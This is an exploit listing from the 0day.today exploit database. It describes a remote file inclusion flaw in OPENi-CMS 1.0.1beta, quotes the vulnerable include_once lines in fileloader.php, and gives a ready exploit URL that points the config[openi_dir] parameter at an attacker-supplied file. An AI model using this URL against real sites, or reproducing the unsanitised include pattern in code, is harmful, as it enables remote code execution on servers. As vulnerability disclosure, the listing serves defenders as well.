[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

OPENi-CMS <= 1.0.1beta (config) Remote File Include Vulnerability

Author
basher13
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-814
Category
web applications
Date add
10-09-2006
Platform
unsorted
=================================================================
OPENi-CMS <= 1.0.1beta (config) Remote File Include Vulnerability
=================================================================



Update:
22:44 09/11/06

Subject:
"OPENi-CMS 1.0.1(config) Remote File Inclusion Vulnerability "

Vulnerable version:
OPENi-CMS 1.0.1

Operating System:
- All OS

Vendor URL:
Support - support@openi-cms.org
Website - http://www.openi-cms.org/

Description:
Openi-CMS he one software PHP Content Management System with facilities 
wysiwyg the editor, plugin, user management to facilitate arranged as 
well as the difference style website 


Vulnerability:
Invalid include function at fileloader.php on line at 5,6 and 7,the 
'$config["openi_dir"]' is not gurantee to including a files. 

// openi-admin/base/fileloader.php

include_once($config["openi_dir"]."/base/constants.php"); // invalid code
include_once($config["openi_dir"]."/base/db_classes.php"); // invalid code
include_once($config["openi_dir"]."/base/site_classes.php"); // invalid code

Exploit:
http://[url]/[path]/openi-admin/base/fileloader.php?config[openi_dir]=[url_inclusion_exploit]

Solution:
upgrade next version

Published by:
basher13 (Infam0us Gr0up - Securiti Research)



#  0day.today [2024-12-24]  #